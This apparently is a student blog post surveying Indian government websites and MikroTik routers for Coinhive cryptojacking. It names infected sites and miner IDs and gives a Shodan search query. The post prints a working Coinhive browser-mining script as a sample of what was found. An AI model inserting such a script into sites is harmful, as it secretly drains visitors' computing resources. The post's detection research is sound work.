Cryptojacking and India - Government Websites and Being Used to Mining Cryptocurrency and Routers are used to spread Cryptojacking malwares



Ever since Coinhive launched their service in September 2017 , cryptojacking is getting very popular ( mostly for bad usages ). Earlier people use to mine cryptocurrencies using their own hardwares but now as its difficulty level increased so its hardware requirements too increased. But services like Coinhive gave people the power to use some one else's system to mine cryptocurrency and make money.

What Is CryptoJacking ?


Cryptojacking is defined as the secret use of user's computing device to mine cryptocurrency. Cryptojacking used to be confined to the victim unknowingly installing a program that secretly mines cryptocurrency. In-browser cryptojacking doesn’t need a program to be installed which makes it more scary.

In the last few months we saw a lot of news regarding cryptojacking . few of them are :

1. Cryptojacking rates increased by 85 times in Q4 2017 as bitcoin prices spiked: report
2. Cryptocurrency Mining Malware Infected Over Half-Million PCs Using NSA Exploit

Its a new topic and not much research is done on it and as it helps hackers make money anonymously so a lot of hackers are into it.

As I'm in my final year of Computer science ( Undergraduate ) so I together with two of my friends - Shakil Ahmed and Anisha Sharma decided to do research on the topic Cryptojacking - Its detection and prevention. 

Before moving ahead with our research we wanted to do a small experiment and see if Indian websites ( mainly Government websites ) and systems are infected with cryptominers and its impact.

The Experiment


Our first aim was to make a list of all the government websites of India and see if they are infected by cryptominers. We searched online for list of government websites but did not get any so we headed over to the website goidirectory.nic.in which list all government websites. So from that website we got around 4,000+ Indian government websites.

Now the next step was to see if the websites have any cryptojacking scripts in it. Today there are many services which allows users to create account and start using their cryptomining scripts. The most popular among them is CoinHive.com . So for our experiment we  checked “coinhive.min.js” - which is  the original Coinhive JavaScript library used in cryptojacking.

It was not a deep analysis, in our experiment we only checked the html of the hompage of each websites so if the script is not present in the homepage we moved on to the next step. We skipped sub-domains too.

We got the following two websites infected by cryptojacker :

1. http://cdma.ap.gov.in 

It is a subdomain of ap.gov.in which have a global ranking of 2495 (Alexa ) . According to Similar Web, cdma.ap.gov.in gets more than 160k+ visits per month. ( Source ) . Since a lot of people visits the website its a perfect target for hacker as more number of views means more money.

cdma.ap.gov.in affected by cryptojacking


We did a reverse IP Lookup on the website and found two more websites :

            a. tirupati.cdma.ap.gov.in
            b. http://macherla.cdma.ap.gov.in/

Both of them were infected by cryptojacking scripts.

2. http://www.ngcnalgonda.org

It is the website of Nagarrjuna Government College, Nalgonda.


Here is how a coinhive script looks like :

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
 var miner = new CoinHive.Anonymous('USER ID', {throttle: 0.3});
 // Only start on non-mobile devices and if not opted-out
 // in the last 14400 seconds (4 hours):
 if (!miner.isMobile() && !miner.didOptOut(14400)) {
  miner.start();
 }
</script>


In Coinhive each user have their own unique USER ID so we decided to dig further and see how many other websites were infected by the same person who infected the above mentioned websites.

Here are the coinhive USER ID of above websites :

1. http://cdma.ap.gov.in -- T9UtNcvcu9o197o4xvHWm49rC3Ba81QR
2. http://www.ngcnalgonda.org -- FEYZ3nALPTlIN0OtzyC78vPpTBYCJzde

We used PublicWWW to see how many other websites were infected by these two users.

1. T9UtNcvcu9o197o4xvHWm49rC3Ba81QR  -- 36 Websites 
2. FEYZ3nALPTlIN0OtzyC78vPpTBYCJzde -- 49 Websites

From this experiment it is clear that hackers are now targeting government websites for mining cryptocurrency as those websites get high traffic and mostly people trust them. Earlier we saw a lot of government websites getting defaced but now injecting cryptojackers are trending as it makes money for the hacker.

After this experiment in Government based websites we tried to see if any Indian system is affected by cryptojackers. Few days back we read the following news : Hackers Infect Over 200,000 MikroTik Routers With Crypto Mining Malware .

We used shodan.io to see how many routers are currently infected any where they are located. we used the following command " http.component:"coinhive" product:"MikroTik http proxy".



To our surprise India ranked second with more than 13,500 routers affected by Cryptojackers which are spreading it further more among users. Top cities include :

1. Raipur
2. Pune
3. Udaipur
4. Mumbai

Conclusion


Through our experiment we got to know that Cryptojacking is spreading fast as it is profitable and majority of people are unaware of it and don't know how to prevent from it. There was a time when hackers use to deface websites and it was easy to detect . But now they simply add cryptojacking scripts in compromised websites making it difficult for users and website owners to detect.

Support our research by donating ETH :

ETH Address : 0xDB6ec3eFD47EC5971FA05b13C8c159Eb2E2547BF